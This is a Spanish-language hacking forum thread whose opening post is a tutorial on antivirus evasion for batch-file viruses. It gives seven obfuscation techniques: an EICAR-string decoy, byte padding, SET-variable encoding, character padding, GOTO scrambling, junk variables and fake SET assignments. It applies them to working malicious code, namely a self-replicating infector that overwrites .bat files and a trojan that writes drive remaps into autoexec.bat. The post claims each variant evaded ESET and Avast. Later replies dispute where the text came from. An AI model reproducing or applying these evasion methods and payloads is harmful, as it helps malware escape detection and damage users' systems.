Resultados 1 al 4 de 4

Tema: Tecnicas Anti AV

  1. #1 Tecnicas Anti AV 
    Iniciado
    Fecha de ingreso
    Dec 2009
    Mensajes
    2
    Descargas
    0
    Uploads
    0
    * * * *

    Tecnicas Anti Av

    Esto no lo puse en Batch Porque realmente es mas para nuestros Bichitos pero si les molesta che
    favor de moverlo al area correspondiente y editarme este txt Gracias seguimos .


    * *Con el fin de hacer de nuestro virus en Batch *:dance: *un poco más discreto, ilegibles o no detectables usamos técnicas de codificación En Batch *:hack: *para engañar a AV y la gente que intenta leer o descifrar el código. Hay muchas maneras diferentes y hoy voy a explicar todas las formas posibles que sé para el cifrado en Batch * AV engañando. *ESET NOD32 Anti-Virus para su gran capacidad heurística y Avast4 Professional Edition para la detección normal. Por favor, recuerde todas las técnicas se han probado en Windows Vista !!!!!
    Sugiero usar el su propio BAT. en lugar del Mio *de manera que se comprenda mejor y funciona sin problemas.

    Paso 1) EICAR Test de archivo:

    AV empresas necesitan una forma de probar si su producto funciona en el ordenador del usuario, pero sin hacer daño a ella, así EICAR nació, una cadena de código universal que pondrá en marcha todos los AV pero mostrará "Archivo de prueba EICAR NO ES UN VIRUS" o algo similar, así que por lo tanto, añadir esta cadena para el comienzo de nuestro código con la esperanza de que el usuario deja funcionar después de ver que es un archivo de prueba y no un virus. Esto le ayudará cuando infecta a personas con conocimientos limitados sobre virus para que definitivamente no es una gran técnica en comparación con los demás, pero, no obstante, aquí es la cadena para el EICAR 'virus' que hay que añadir al principio de su código:
    espero comprendan que hazta yo me enrede *:crazy: :crazy: XD *:wate: :wate:

    Código:
    X5O!P% @AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
    Paso *2) Fake Bytes: *Falsos Bytes

    Todos AV sólo buscará los primeros 1000 bytes de un archivo por lotes para cualquier código malicioso, ¿y qué hacemos? Añadimos un montón de cartas en los primeros 1000 bytes de nuestro código, bastante fácil y una excelente manera de eludir los escáneres y en algunos casos, la heurística AV. Así que aquí es exactamente 1000 bytes de código inútil que debe aparecer al comienzo de su código:

    Código:
    Jfnvjdfvbdfrjcedjcndskcjlewkjdelkasusywkiqwndsjhcgbdkisknckichcdsjyefgwiednnauxx​bjnkaskjgbuhyhdgddr
    Djdchcvnfdhvjknvjknvfbdfhvbdfjncfdnfhvjrhskjfnmaskldnchfvbgfvffscdjfbnjehcfnjhcb​jhnvdjuknvchdhbhvhf
    
    Fdgvcdfgcvjhvbnfvfdhbfvdjnfvdnbjfvnjgbnjkfvsjlsfdjhfsndsajkfdsvefeyufguyshduygfb​dbcyufreubfuyhfdbk
    
    Fndsfungcuhfjhcvnhsfdncjsjzlixldjfouyfhfrufmrnjhggvcnnfvdeyhfyfghnfguhfuyndfhfdr​sognfdhjfdyfdhfdhg
    
    fhvbdh7rhuigfuhgudjfdujguighsudgduhgjugsifdkgiojfdhiudfgmnjhdgufhuigfjguijgukhgk​jgufdhgjfugfchghjh
    
    hsbdfjdrbfjdbgvfovngkllksfjbnmgkjvnvjkgfnkbfgvhnfgijgfjknfghjgffghdunvuhnuihgfgj​ifugjiuhdruiryhgui
    
    dsbdyhceyifgbycgnjhfhjhvfbdgjhnhjhsdhbgsftrhgbvsrulsfkewajfreihnrnusrnvcuhiurgfe​uygfruyfgybfdbkjkd
    
    dscgfbdofnjkfhnkjfnkovmhuihgudljcugrhnuhvgvnuivgfhgdfigjngnklvtghnmgiojgfnkjgfhn​fhngfvjnkfgblkgfng
    
    fdkbsdcfhnmvghnfvkjfjkgfpkogjroisjoersmcetkuntbggkhgjhdlewrlkjrhjiurnvuinvynbtrh​urenyviuntruirtunv
    
    dsuifhuyafgbycfgruyfgnucafipjnfnjkhnfidhfvmdkhzkdlhfnuygjkdngtfrjhnguhyghsduvbgr​jkhvsriulkghnkjhgu

    Trick 3) La Norma Técnica de cifrado (SET):

    Como indican las siglas que se trata de una técnica mediante la cual el comando 'set' en MS-DOS se utiliza para cifrar el archivo Batch *y hacer que sea difícil para el AV para analizar y para el usuario de interpretar. Hacemos esto mediante la asignación de una variable a un conjunto de comandos, esto podría no tener sentido, pero ver a continuación:
    Esto fue detectado como "BAT / Silly.D Virus 'por ESET NOD32:

    Código:
    for %%a in (*.bat) do copy %0 %%a
    Ahora, mediante la encriptación de las variables: de, en, hacer y copia se hará sin ser detectados. Aunque no se detectó mediante el cifrado de sólo una de las variables, esto no siempre será el caso.
    Esto no fue detectado por ESET NOD32 o Avast4

    Código:
    set a=for
    set b=in
    set c=do
    set d=copy
    %a% %%a %b% (*.bat) %c% %d% %0 %%a
    Esto será complicado para los Mijos entender *:hack: , pero no para las personas con un conocimiento de Batch *a fin de lo que podría hacer es que el cifrado establecido en la parte inferior de su código y, a continuación empezar a leer la parte superior, esto funciona bien con el código de grandes como el usuario tendrá que desplazarse hacia abajo para ver el conjunto de cifrado. Usted puede hacer esto simplemente por tener un comando 'GOTO' goto que el parámetro de descifrado antes de regresar a la clave de cifrado, utilizando más de una variable será mucho más difícil de leer! un ejemplo:

    Código:
     @echo off
    GOTO decrypt
    :infect
    %a% %%a %b% (*.bat) %c% %d% %0 %%a
    %a% %%a %b% (C:\*.bat) %c% %d% %0 %%a
    %a% %%a %b% (C:\Windows*.bat) %c% %d% %0 %%a
    exit
    :decrypt
    set a=for
    set b=in
    set c=do
    set d=copy
    goto infect
    Paso 4) Carácter de desbordamiento:

    Esto es sólo un nombre imponente en la técnica contra un AV que ayudará al ocultar sus líneas y engañar a la AV desde la detección de las señales directamente en su lote. Todo lo que necesitas hacer es agregar caracteres entre cada línea de código, también puede ser números que utiliza el carácter 'n' como se usaba en el gusano Sasser legendario para causar un desbordamiento de búfer. La única pega es que el virus tiene que tener más de 3 o 4 líneas para trabajar eficazmente.
    Este es un virus por Ratty que se ha detectado como "BAT / Ratty.Substcde.A de Troya" por ESET NOD32

    Código:
     @echo off
    ctty nul
     @echo subst e: a:\ > c:\autoexec.bat
     @echo subst d: a:\ >> c:\autoexec.bat
     @echo subst c: a:\ >> c:\autoexec.bat
    ctty con
    cls
    Cuando se utilizo la técnica de desbordamiento de caracteres *no fue detectado por ESET NOD32:

    Código:
    nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
     @echo off
    nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
    ctty nul
    nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
     @echo subst e: a:\ > c:\autoexec.bat
    nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
     @echo subst d: a:\ >> c:\autoexec.bat
    nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
     @echo subst c: a:\ >> c:\autoexec.bat
    nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
    ctty con
    nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
    cls
    nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
    Paso 5) GOTO engañador:

    Esto es un poco práctico, ya que tiene muy largo y es bastante confusa, dependiendo del tamaño de su código. Sólo funciona con el código que es más largo y luego 5 líneas. Lo que hace es confundir a la AV por dar órdenes goto múltiples para las cadenas del virus es leído por separado y no como una sola expresión por lo que no será detectado.
    Este es un virus por Ratty que se ha detectado como "BAT / Ratty.Substcde.A de Troya" por ESET NOD32:

    Código:
     @echo off
    ctty nul
     @echo subst e: a:\ > c:\autoexec.bat
     @echo subst d: a:\ >> c:\autoexec.bat
     @echo subst c: a:\ >> c:\autoexec.bat
    ctty con
    cls
    Usando el engañador de GOTO no fue detectado por ESET NOD32:

    Código:
     @echo off
    goto a
    :f
    ctty nul
    goto b
    :l
     @echo subst e: a:\ > c:\autoexec.bat
    goto c
    :m
     @echo subst d: a:\ >> c:\autoexec.bat
    goto d
    :r
     @echo subst c: a:\ >> c:\autoexec.bat
    ctty con
    cls
    :a
    goto f
    :b
    goto l
    :c
    goto m
    :d
    goto r
    Paso 6) Papelera Código:

    Esto se refiere a las líneas de código que simplemente no hacer nada, pero por lo que el AV se refiere a su código de trabajo así que lo que hacemos con esto en mente? Ponemos la basura sin sentido entre nuestros códigos reales, sin embargo es importante señalar que las líneas que está utilizando para el código de la basura no se usa para cualquier cosa:
    Esto fue detectado como "BAT / Silly.D Virus 'por ESET NOD32:
    Código:
    for %%a in (*.bat) do copy %0 %%a
    Cuando se utiliza el código de basura o basura que no se detectó mirar *:wate:

    Código:
    set trash=
    %trash% for %trash% %%a %trash% in %trash% (*.bat) %trash% do %trash% copy %trash% %0 %trash% %%a
    En la primera línea hemos hecho la basura seguro se creó para nada, entonces añadir el código del virus funcionó a la perfección sin ser detectado!

    Paso 7) Fake técnica SET: Falsas Tecnicas SET

    A pesar de nuestra técnica de cifrado es suficientemente fuerte para que la heurística y la AV técnica hará mucho más difícil de encontrar y también para ser depurado. Esta técnica consiste en el "set% variable% = comando%", salvo que se dan las variables de comandos falsos y después fijar los comandos reales ver más abajo para mayor claridad:

    Código:
    set acv=ren
    set acv=for
    set acv=copy
    set axv=yes
    set axv=for
    set lmno=ggg
    set lmno=in 
    %axv% %%a %lmno% (*.bat) do %acv% %0 %%a
    Como se puede ver que cambió el nombre viable un par de veces que comienza a ser difícil, especialmente cuando el código es larga! N AV lo detectará, ya que no ha establecido una cadena, y le dará una heurística muy difícil de emular el código!.

    Recuerde que este es para fines educativos no utilizan
    Con malicia! esto no garantiza un bichito 100% Indetectable son formas y maneras para futuros bichitos que hagamos siempre en busca de compartir y analizar salu2


    Phanton 1000²

    Salu2 a Broken_Machine,Cacho,Karlos0793,jdos666
    Phanton 1000²
    Citar  
     

  2. #2  
    Moderador HH
    Fecha de ingreso
    Sep 2003
    Mensajes
    1.384
    Descargas
    21
    Uploads
    5
    Se agradece, ¿la traducción?

    Vale citar la fuente

    http://vx.netlux.org/lib/
    - Me desagrada
    - ¿Por qué?
    - No estoy a su altura.
    ¿Ha respondido así alguna vez un hombre?

    Friedrich Nietzsche



    Citar  
     

  3. #3  
    Iniciado
    Fecha de ingreso
    Dec 2009
    Mensajes
    2
    Descargas
    0
    Uploads
    0
    Cita Iniciado por Marchi Ver mensaje
    Se agradece, ¿la traducción?

    Vale citar la fuente

    http://vx.netlux.org/lib/
    No mi Apreciado amigo esa no es la fuente esto lo concluimos entre
    broken machine y los demas en dado caso la fuente seria esta

    Fuente
    se ah publicado en varios foros De habla Ingles esta vez vi este foro
    y decidi ser parte de ella salu2
    Phanton 1000²
    Citar  
     

  4. #4  
    Moderador HH
    Fecha de ingreso
    Sep 2003
    Mensajes
    1.384
    Descargas
    21
    Uploads
    5
    Acá se encuentra publicado el mismo documento (salvo por el Paso 7) con fecha Julio 2009, siendo una traducción practicamente literal. El supuesto autor, es cOrRuPt G3n3t!x.
    En cuanto a la fuente que me dirigís, es un foro del cual vos sos Colaborador, y en cual la fecha de publicación fue Octubre 2009.

    Salvo que el autor halla sido el mismo, alguién lo copió y ni siquiera se tomo el trabajo de cambiar minimamente los ejemplos.

    Saludos
    - Me desagrada
    - ¿Por qué?
    - No estoy a su altura.
    ¿Ha respondido así alguna vez un hombre?

    Friedrich Nietzsche



    Citar  
     

Temas similares

  1. Respuestas: 0
    Último mensaje: 26-02-2014, 10:59
  2. Respuestas: 1
    Último mensaje: 10-03-2013, 22:12
  3. Nuevas tecnicas hack for me??
    Por alvaro4356 en el foro GENERAL
    Respuestas: 0
    Último mensaje: 15-08-2007, 04:20
  4. Tecnicas para colar un troyano
    Por lado en el foro GENERAL
    Respuestas: 36
    Último mensaje: 22-05-2007, 20:39
  5. Ayuda tecnicas forenses
    Por megalodon en el foro GENERAL
    Respuestas: 3
    Último mensaje: 14-03-2005, 16:11

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •